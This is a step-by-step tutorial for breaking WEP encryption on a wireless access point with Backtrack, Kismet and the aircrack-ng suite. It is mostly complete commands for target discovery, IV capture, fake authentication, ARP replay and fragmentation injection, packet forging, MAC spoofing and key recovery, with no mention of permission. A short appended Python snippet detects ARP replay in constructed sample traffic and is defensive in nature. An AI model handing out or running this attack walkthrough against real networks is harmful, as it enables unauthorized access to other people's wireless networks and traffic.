Steps To Be Followed

STEP 1: Monitoring Wireless Traffic With Kismet

Place the Backtrack CD into your CD-ROM drive and boot into Backtrack. You may need to change a setting in your BIOS to boot from the CD-ROM. During boot-up you should see a message like "Hit ctrl+esc to change bios settings". Changing your first boot device to CD-ROM will do the trick.

Once booted into Linux, log in as root with username: root, password: toor. These are the default username and password used by Backtrack. A command prompt will appear. Type startx to start KDE (a 'Windows'-like workspace for Linux).

Once KDE is up and running, start Kismet by clicking on the start key and browsing to Backtrack -> Wireless Tools -> Analyzers -> Kismet. Alternatively you can open a terminal and type:

kismet

Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely 'ath0', and sit back as Kismet starts detecting networks in range.

NOTE: We use Kismet for two reasons.
1. To find the BSSID, ESSID, and channel number of the AP you are accessing.
2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point), or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device's name just type:

iwconfig

While Kismet detects networks and the various clients accessing those networks, you might want to type 's' and then 'Q' (case sensitive). This sorts all of the APs in your area by their signal strength. The default 'autofit' mode that Kismet starts up in doesn't allow you much flexibility. By sorting APs by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on.

(Side note: when selecting the target AP keep in mind this tutorial only covers accessing host APs that use WEP encryption. In Kismet the flags for encryption are Y/N/0: Y = WEP, N = open network (no encryption), 0 = other, most likely WPA.) Further reading on Kismet is available here.

Select the AP (access point) you want to access. Copy and paste the broadcast name (ESSID), MAC address (BSSID), and channel number of your target AP into a text editor. Backtrack is KDE based so you can use kwrite: just open a terminal and type 'kwrite', or select it from the start button. In Backtrack's terminal you copy and paste with shift+ctrl+c and shift+ctrl+v respectively.

Leave Kismet running to keep your wireless adapter in monitor mode. You can also use airmon-ng to do this manually; type airmon-ng -h for more help with this.

STEP 2: Collecting Data With Airodump

Open up a new terminal and start airodump so we can collect ARP replies from the target AP. Airodump is fairly straightforward; for help with this program you can always type "airodump-ng -h" at the command prompt for additional options.

airodump-ng ath0 -w /mnt/hda2/home/ryan/belkin_slax_rcu 9 1

Breaking down this command:
* ath0 is my wireless card
* -w tells airodump to write the file to /mnt/hda2/ryan/belkin_slax_rcu
* 9 is the channel (channel 9) of my target AP
* 1 tells airodump to only collect IVs - the initialization vectors from the WEP data packets, which is what aircrack needs to recover the key

STEP 3: Associate your wireless card with the AP you are accessing.

aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0

* -1 at the beginning specifies the type of attack. In this case we want fake authentication with the AP. You can view all options by typing aireplay-ng -h
* 0 specifies the delay between attacks
* -e is the ESSID tag. belkin is the ESSID or broadcast name of my target AP. Linksys or default are other common names
* -a is the BSSID tag (MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
* -h is your wireless adapter's MAC address. You can use macchanger to view and change your MAC address: macchanger -s ath0
* ath0 at the end is my wireless adapter's device name in Linux

STEP 4: Start packet injection with aireplay

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0

NOTES:
* -b requires the MAC address of the AP we are accessing.
* -h is your wireless adapter's MAC address. You can use macchanger to view and change your MAC address: macchanger -s ath0
* If packets are being collected at a slow pace you can type iwconfig ath0 rate auto to adjust your wireless adapter's transmission rate. You can find your AP's transmission rate in Kismet by using the up or down arrow keys to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.

As aireplay runs, the ARP packet count will slowly increase. This may take a while if there aren't many ARP requests from other computers on the network. As it runs, however, the ARP count should start to increase more quickly. If the ARP count stops increasing, just open up a new terminal and re-associate with the AP via step 3. There is no need to close the open aireplay terminal window before doing this; just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.

If you get a message like this:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

just re-associate with the AP following the instructions in step 3.

STEP 5: Decrypting the WEP Key with Aircrack

Find the location of the captured IVS file you specified in step 2. Then type in a terminal:

aircrack-ng -s /mnt/hda2/home/belkin_slax_rcu-03.ivs

Change /mnt/hda2/home/belkin_slax_rcu-03.ivs to your file's location. Once you have enough captured data packets, decrypting the key will only take a couple of seconds. For my AP it took 380k data packets. If aircrack doesn't find a key almost immediately, just sit back and wait for more data packets.

A simpler, clientless attack. Here are all the commands:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0

Pick your target, copy its BSSID, and press ctrl + C to end airodump.

airodump-ng -c (channel) -w wep --bssid (paste AP's mac here) wlan0

Open a new Konsole:

aireplay-ng -1 0 -a (paste AP) -h 00:11:22:33:44:55 wlan0
aireplay-ng -5 -b (paste AP) -h 00:11:22:33:44:55 wlan0

A packet will pop up; verify that the MAC is the same MAC as your target. Press Y if it is, N if it's not.

packetforge-ng -0 -a (paste AP) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y (the .xor filename, starts with fragment...) -w ARP
aireplay-ng -2 -r ARP wlan0

Press Y. It will start injecting, and data packets will rise like crazy. When enough data is obtained:

aircrack-ng wep-01.cap
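As an added detection-side example, not part of the original tutorial: the ARP replay in step 4 works by retransmitting one captured, still-encrypted ARP request unchanged, so a wireless IDS can spot it by counting identical WEP frame bodies (same IV plus ciphertext) coming from a single station at a rate no real client produces. The frames, timestamps and MAC addresses below are constructed sample data; the lasting fix is retiring WEP for WPA2/WPA3, and this detector only tells you when that has not happened yet.

```python
import bisect
from collections import defaultdict


def build_sample_capture():
    """Constructed sample, not a real capture: (timestamp, source MAC, encrypted body).
    Bodies are 40 bytes, ARP-request sized; the WEP IV is the first 3 bytes."""
    legit_client = "00:aa:bb:cc:dd:01"   # assumed address of a normal station
    injector = "00:fe:22:33:f4:e5"       # the -h address used in the tutorial
    frames = []
    # Normal client: a fresh IV on every frame, two frames per second.
    for i in range(20):
        frames.append((i * 0.5, legit_client, bytes([i, 0x10, 0x20]) + bytes(37)))
    # Replaying station: the very same frame (same IV, same ciphertext) 300 times in one second.
    replay = bytes([0x7A, 0x7B, 0x7C]) + bytes(37)
    for i in range(300):
        frames.append((5.0 + i / 300.0, injector, replay))
    return frames


def detect_arp_replay(frames, window_s=1.0, min_repeats=50):
    """Return {source MAC: peak repeats} for stations that resend one byte-identical
    WEP frame body at least min_repeats times inside any window_s-second window.
    Legitimate WEP traffic never repeats an IV+ciphertext pair at that rate."""
    seen = defaultdict(list)               # (src, body) -> list of timestamps
    for ts, src, body in frames:
        seen[(src, body)].append(ts)
    alerts = {}
    for (src, body), times in seen.items():
        times.sort()
        peak = 0
        for i, t in enumerate(times):
            # Number of copies of this exact frame within [t, t + window_s].
            j = bisect.bisect_right(times, t + window_s)
            peak = max(peak, j - i)
        if peak >= min_repeats:
            alerts[src] = max(alerts.get(src, 0), peak)
    return alerts


if __name__ == "__main__":
    for mac, count in detect_arp_replay(build_sample_capture()).items():
        print(f"ARP replay suspected from {mac}: {count} identical frames/s")
```

In a live deployment the same logic runs over monitor-mode frames from a capture library, keyed on the data frame's IV and payload rather than on constructed bytes.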